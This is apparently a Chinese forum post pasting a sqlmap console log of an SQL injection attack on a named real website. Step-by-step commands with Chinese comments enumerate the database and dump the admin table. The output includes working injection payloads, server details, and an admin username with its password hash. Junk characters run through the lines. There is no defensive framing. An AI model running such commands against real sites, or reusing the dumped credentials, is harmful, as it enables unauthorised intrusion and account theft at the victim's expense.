D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 G" G5 p5 v8 Jms "Mysql" --current-user /* 注解:获取当前用户名称( J) v7 L. m0 ~" e! t% F: P
sqlmap/0.9 - automatic SQL injection and database takeover tool, \; A( t6 X2 T0 U0 L2 x, B
http://sqlmap.sourceforge.net starting at: 16:53:54
* \8 G* n! Q8 K* C9 N* v' {! n4 [% b[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ Z9 O. ~5 F, z5 D
session file [* c) B5 Z3 B/ V9 q! U' f/ p2 s, E
[16:53:54] [INFO] resuming injection data from session file# ]- g7 w, c4 \; Z
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) z7 n" i0 J$ D8 q: [- K
[16:53:54] [INFO] testing connection to the target url7 P# a, T9 Y* v/ _3 s% t5 {
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 L6 O* t# z O% i( b8 E* y; v
sts:
( Y5 J+ Q+ ~7 H---% n( W! E7 x7 [
Place: GET3 Y2 k8 V) p5 p8 G
Parameter: id
; V4 C8 I1 u# x, Z: t Type: boolean-based blind
6 E* [4 @/ F' A* _ Title: AND boolean-based blind - WHERE or HAVING clause$ L; f3 T4 J. t
Payload: id=276 AND 799=7991 `( d* o. @: d- |3 M
Type: error-based
( Q& r3 _, ~, }1 k- p/ Q1 s Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 O' A2 E8 n4 ~) V l! v- E( c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' N$ a$ J! W+ f/ a7 w6 P( Z8 `5 G7 w
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 M( o- {$ e" w" n1 I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: h* v5 p+ q" C$ p) w- f9 ` Type: UNION query7 n8 s- G2 W' _9 `/ @1 X
Title: MySQL UNION query (NULL) - 1 to 10 columns
' K8 }( }6 ]4 }) j ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
/ x9 H6 Q( e$ f/ g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 \& G- {: s2 S8 n' m, N6 H
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) k* T w3 L6 k
Type: AND/OR time-based blind
2 f) r* e+ o9 l3 Z' y2 _& e9 r5 z$ d5 y8 ` Title: MySQL > 5.0.11 AND time-based blind4 O* ~8 _. Z# ~! L4 N7 t: y! p! B. w u
Payload: id=276 AND SLEEP(5)
, |3 r/ r- L' r! d$ t. u9 d* l---
0 {7 ]; \1 [* Y1 k& o; h7 r, w[16:53:55] [INFO] the back-end DBMS is MySQL5 e q2 s* t: F0 C" U; D
web server operating system: Windows
: a: _9 l8 x- dweb application technology: Apache 2.2.11, PHP 5.3.05 _' P+ W: [3 T7 P$ t
back-end DBMS: MySQL 5.04 v8 a( n: w/ K: |. \, E
[16:53:55] [INFO] fetching current user
8 Z5 Y8 M& Y1 E/ Gcurrent user: 'root@localhost'
" m7 N0 D* c( q' e[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' D. L; L: y1 o5 Z, q! v
tput\www.wepost.com.hk' shutting down at: 16:53:583 h$ U! H* \1 C' j; Z8 e/ Q
/ b2 C) \, F. d2 ^D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 F( X; D4 R$ T# x7 ?9 c
ms "Mysql" --current-db /*当前数据库
- m3 Q% b$ e5 ^, n6 W6 `( a: U sqlmap/0.9 - automatic SQL injection and database takeover tool
, u+ L9 Q, e' \7 } http://sqlmap.sourceforge.net starting at: 16:54:16* [ J: u: F' Z P" R
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
6 d6 m8 } D% M) u2 m+ G5 k- H) v! s4 q session file
' \* M- R( j. i4 s; ]5 v' O[16:54:16] [INFO] resuming injection data from session file, j; N i, ?. ~' ~# N B: F$ k
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 m6 p+ Y( Z5 P6 D- O# P; ~[16:54:16] [INFO] testing connection to the target url
/ Q3 s$ q" G7 S# x; c- @sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ i/ r) v; g( f: b8 r/ asts:- o* a% I0 T$ Z K) c" x
---- E' Q+ q, u6 o7 d2 H' y y/ f
Place: GET% P/ r# R2 t* @5 n: c6 a# v9 X
Parameter: id
9 u7 [- D1 S; M4 @& F6 l. {0 s4 D Type: boolean-based blind* Y. ^. j$ L6 B) ^; |0 [+ e
Title: AND boolean-based blind - WHERE or HAVING clause
+ [$ M9 h9 o6 d; `- a Payload: id=276 AND 799=799( W# O! j- X+ V' @2 j+ y$ s
Type: error-based
/ U, j' T$ R* l! R b Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# I9 {! x& `6 V% _. n Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ i6 V6 o2 M9 ?- B
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& \+ X2 e3 t4 p/ z2 X, U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" r3 m8 T* G( D
Type: UNION query( w- e3 z# _1 |7 ?
Title: MySQL UNION query (NULL) - 1 to 10 columns& N' U6 M9 X( D( D9 [% l$ l
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. s W) J* d4 q& g# \( w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% v* z& O2 R1 ^& {9 K* h2 }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: ^3 R1 u; y2 w4 z
Type: AND/OR time-based blind
4 R0 ^4 _, R1 a v- d) r+ P; _- Q Title: MySQL > 5.0.11 AND time-based blind
5 X/ @8 D2 M1 p Payload: id=276 AND SLEEP(5)
2 `% }; P" r5 r8 z5 ~---8 |( A" ~$ m- `0 v
[16:54:17] [INFO] the back-end DBMS is MySQL
' B X# T6 e: |& l; ~web server operating system: Windows
" w4 W' u6 O% D+ t3 u6 lweb application technology: Apache 2.2.11, PHP 5.3.0
7 |$ i0 X8 f2 C' H0 J# P+ Zback-end DBMS: MySQL 5.0: U6 R& m( q7 z/ V' P9 u( n% ?2 k
[16:54:17] [INFO] fetching current database9 w9 f# [4 h7 D# Y- j
current database: 'wepost'
1 `5 L+ O$ c+ ?$ @% Y[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ E( I* e1 V0 I( |2 p, C% }
tput\www.wepost.com.hk' shutting down at: 16:54:18( L2 ^ m/ E, ?) y$ L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db% E y5 j$ Z2 n& S# T7 U. m- C
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
! {1 T1 b$ h7 H8 s9 N% n sqlmap/0.9 - automatic SQL injection and database takeover tool1 A: k' E" o$ D/ `( g, l4 z6 E
http://sqlmap.sourceforge.net starting at: 16:55:25
& u) j5 l! q1 ]9 ]! N* k[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 K5 P% S$ ]6 z+ v
session file! ]% U( P; ?2 W7 M4 W# n
[16:55:25] [INFO] resuming injection data from session file& F7 y w9 @) \. l1 D. L4 w
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ O' z! b, i6 f4 R( Q/ a
[16:55:25] [INFO] testing connection to the target url" }) Q7 O0 v" R6 r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* J1 ]! b. d; F- Z
sts:
6 [- S/ {' v* M- m3 R---
0 q/ l, ?1 x% ]Place: GET6 o3 W8 S" E! o: B/ p9 Q
Parameter: id/ T3 s( u/ j+ v; t2 I, W
Type: boolean-based blind9 ^+ \8 j+ J5 i# j
Title: AND boolean-based blind - WHERE or HAVING clause/ Q1 x+ F# a8 _, s$ z3 y/ r, i
Payload: id=276 AND 799=799
, D+ T) _" T, [0 b Type: error-based6 g: _! c8 Q7 Y. j; [; K
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 V r5 E& ^& e& b Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, {% k" ]" |: j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 J3 h+ Q& p5 ]: j! N A/ ?9 _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 F6 R2 ^ Q" m" L1 M
Type: UNION query* }) w' V' r' B5 A) C6 X
Title: MySQL UNION query (NULL) - 1 to 10 columns
% T4 K; W& \- J$ b/ s4 a* p Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 U" M% S/ a/ K9 h5 Q; u6 w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ z7 Z/ l& E, ^0 M: a6 yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ m) c% r8 ?" j) j
Type: AND/OR time-based blind
* [' r3 t3 k* |, o6 ] Title: MySQL > 5.0.11 AND time-based blind
+ ]2 h- s. A4 y6 p9 N7 G; { Z Payload: id=276 AND SLEEP(5)" ^4 q, g/ [& A* E6 c# y
---
0 j& }9 M( W5 L* s5 x[16:55:26] [INFO] the back-end DBMS is MySQL
. w2 c0 Q1 ^. p. E5 d+ `' B# lweb server operating system: Windows
' v$ k; \& q. M& D- j4 e0 M1 _web application technology: Apache 2.2.11, PHP 5.3.0
* p( Y; Q, y- W" s! E# D5 [* U% H6 { jback-end DBMS: MySQL 5.0
/ n9 @$ c( _6 M; O1 D) ~" Y/ o[16:55:26] [INFO] fetching tables for database 'wepost'* D) O2 G: S. i% v/ r
[16:55:27] [INFO] the SQL query used returns 6 entries4 R7 b. p" q* e- r( P
Database: wepost- Y/ K" W1 H! f' x
[6 tables]. G7 E+ m/ V: t7 p! g# u4 N
+-------------+8 I% A# {# l6 q0 j/ j
| admin |5 k6 p i1 }3 Y7 i0 n
| article |3 n, I( A) j' r3 ?, C3 _
| contributor |( h0 {5 C5 s% R" b3 f1 M. f- v
| idea |) g; ?% s; n9 O3 B2 D$ U2 ?
| image |: h* V. N. e0 W
| issue |
9 H7 H/ y6 {8 l& z D4 E+-------------+$ f O$ B x' p% v1 A
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 k- h4 [5 u& R. C" v
tput\www.wepost.com.hk' shutting down at: 16:55:33
% s' f2 M4 z' P. F
+ E+ n* k& }' \ K3 q! qD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ w$ a# W4 B" u7 p" ~) {- D$ S
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名3 E0 j/ |7 N5 r' f
sqlmap/0.9 - automatic SQL injection and database takeover tool
* K% q1 s1 h6 e' J5 Q, D5 m0 u* x http://sqlmap.sourceforge.net starting at: 16:56:06
! Q% L8 }. F# {5 y+ N: Y) Tsqlmap identified the following injection points with a total of 0 HTTP(s) reque' [* n, d+ z/ g1 a1 g- T6 J
sts:, O9 l% W' K8 V
---' D! D9 Z. B) {7 M' p
Place: GET' u K5 K ]5 Y# a
Parameter: id
2 H" F9 g+ `1 c7 I+ i% H2 H Type: boolean-based blind
' c+ w3 V! o! D, H: F3 r Title: AND boolean-based blind - WHERE or HAVING clause3 i2 @% o: U* q0 z' w- e6 @
Payload: id=276 AND 799=799
4 a. M" g. M# S% ~. x8 | Type: error-based0 j! L. O n5 b' S# q/ j- L+ T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 P! ]" R0 N1 G( Z3 B2 { Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; D$ i6 B# r4 H' L, U* }# K120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 ?9 O2 ^. Z: m% i
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): e1 |* i/ D0 Y4 j
Type: UNION query
! _# A. F# i# W Title: MySQL UNION query (NULL) - 1 to 10 columns7 b2 I2 r+ a0 Q4 [4 ^) J. I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. Q6 `# A" d p) G9 }* e' p
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( [- H. l: }% j2 i8 M3 I) y& l
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 o0 R( W- ~5 B/ z+ }% z Type: AND/OR time-based blind
3 Q/ d+ B2 F- K# Z6 y. T Title: MySQL > 5.0.11 AND time-based blind q1 R" k5 p4 y3 k& u
Payload: id=276 AND SLEEP(5)
* I4 a4 f- K+ B3 `( [---
; f6 u. g+ U# Gweb server operating system: Windows6 y: `3 f; O: ?& E
web application technology: Apache 2.2.11, PHP 5.3.0
5 C8 t: ?3 |4 ^7 |5 ?# W% m$ Y" v' U5 Kback-end DBMS: MySQL 5.0
% F2 o! V- }! u# Y, o- O; U+ O[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se! e& H5 c5 j8 O
ssion': wepost, wepost
5 x5 A* L7 l0 x7 Y7 kDatabase: wepost
; g6 g1 ]5 y) r1 @, WTable: admin
) y' _4 r3 h! z" H[4 columns]( a) g4 i8 t7 O8 \) O; g$ ^
+----------+-------------+
7 A3 C: f) A$ L! j" a* _| Column | Type |9 c5 X$ \* l. v" e. C
+----------+-------------+ v8 E: N0 p3 l2 ~7 z/ T, Y( v( j
| id | int(11) |
; j- y5 r; _* F| password | varchar(32) |) H' ?) V3 s$ b2 i+ t
| type | varchar(10) |2 m$ r% b/ q" B
| userid | varchar(20) |& M3 G! S7 R5 k+ I
+----------+-------------+
# u' ~& y& ]7 c! e, K shutting down at: 16:56:19
' ~: m) n' e7 ]+ S0 O8 P- N% C3 d7 V7 G i( q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" D) ], t( m. tms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容: r7 l; {$ L6 ^: r. y4 e! T) f
sqlmap/0.9 - automatic SQL injection and database takeover tool
}. Y) ~5 t* I! m$ C5 c http://sqlmap.sourceforge.net starting at: 16:57:14
0 v# X! M# e" j* U- T" m5 j4 \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
M- o3 V! O# ssts:! ?: V, x7 p* }' b5 J: P# Q/ T7 R7 n
---
3 C8 W% a5 o) qPlace: GET9 L- j: x2 g1 x$ B7 T8 u
Parameter: id6 B: Y2 l9 B0 X. p5 r/ z
Type: boolean-based blind- q; u, a3 m& n9 P6 D4 V* J
Title: AND boolean-based blind - WHERE or HAVING clause
5 x% b2 o; _6 H" _ Payload: id=276 AND 799=799
]( ]; D1 W* u( ?. c$ y1 q Type: error-based& I7 ]1 h8 o2 a$ ^/ v0 b
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* T: d# A7 G1 x" n0 @# E7 i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 Q% d9 y0 K3 k/ b* ?* Y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* A& `* i e: ?1 Y I& [
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" B' w0 @( T* J; p, R3 [ Type: UNION query
2 R+ Q/ \, e, L7 {4 L& N% _ Title: MySQL UNION query (NULL) - 1 to 10 columns$ ?* M2 N. T0 k, ]" f1 m& I) Q7 ^+ K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
W8 _/ L9 ?2 S+ ]5 R1 f! O# M: v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 E7 }1 D# y, I$ h" O0 kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 g& _5 S) f/ [" {9 G
Type: AND/OR time-based blind8 s3 a n; j2 c) O4 C9 d; d
Title: MySQL > 5.0.11 AND time-based blind
# a- Y0 Q; P1 h+ `. H. v0 _ Payload: id=276 AND SLEEP(5)
# d1 d0 W- T D---3 e0 w6 C* D& ?- A
web server operating system: Windows
% l6 Q( K( @) Yweb application technology: Apache 2.2.11, PHP 5.3.0# C' W8 y+ [7 g2 L$ b5 l
back-end DBMS: MySQL 5.0
* R2 `/ X. H) {1 H3 u" @recognized possible password hash values. do you want to use dictionary attack o' K% z% K% T$ i$ T+ V8 J
n retrieved table items? [Y/n/q] y
) \* S2 t J, ^6 c2 i5 t# H$ k! Gwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]1 F. V9 P* k& r& ^6 X& C
do you want to use common password suffixes? (slow!) [y/N] y
1 x, w6 I- P; K4 p7 I" y bDatabase: wepost
' H# l: G, D# yTable: admin9 P# L! Y7 [/ n4 E; a" [6 y
[1 entry]
K4 s( G& F3 W: x! r0 h+----------------------------------+------------+8 W3 W" l/ L T& T2 q
| password | userid |$ l! ?8 a. m9 [+ Q
+----------------------------------+------------+ w9 w% d: a: B) j! f
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |! z, J2 X6 s6 d Z' V5 v1 h
+----------------------------------+------------+# {* U1 t& R e1 _, _# y
shutting down at: 16:58:14; ]9 U0 z" Z3 ]" v. ^
) m5 e+ n' _: g! S, QD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对